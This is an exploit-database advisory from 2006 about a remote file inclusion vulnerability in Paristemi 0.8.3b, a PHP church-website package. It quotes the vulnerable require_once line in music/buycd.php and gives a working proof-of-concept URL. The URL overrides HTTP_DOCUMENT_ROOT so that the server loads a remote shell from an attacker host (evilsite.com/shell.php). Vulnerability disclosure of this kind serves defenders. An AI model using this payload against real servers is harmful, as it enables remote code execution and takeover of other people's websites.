Paristemi 0.8.3b (buycd.php) Remote File Include Vulnerability

2006-12-19T00:00:00
ID 1337DAY-ID-1271
Type zdt
Reporter nuffsaid
Modified 2006-12-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
Paristemi 0.8.3b (buycd.php) Remote File Include Vulnerability
==============================================================



+-------------------------------------------------------------------------------------------
+ Paristemi 0.8.3b (buycd.php) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Vendor ............: http://www.paristemi.com/
+ Affected Software .: Paristemi 0.8.3b
+ Description .......: "Paristemi is a PHP/MySQL free website for churches"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+-------------------------------------------------------------------------------------------
+ Details:
+ Paristemi music/buycd.php fails to initialize the $HTTP_DOCUMENT_ROOT variable before using
+ it to include files, assuming register_globals = on, we can initialize the variable in a
+ query string and include a remote file of our choice.
+
+ Vulnerable Code:
+ music/buycd.php, line(s) 03:
+ -> <?php require_once $HTTP_DOCUMENT_ROOT.$INCLUDE_PATH.$HEADER.
+ 
+ Proof Of Concept:
+ http://[target]/[path]/music/buycd.php?HTTP_DOCUMENT_ROOT=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------



#  0day.today [2018-04-10]  #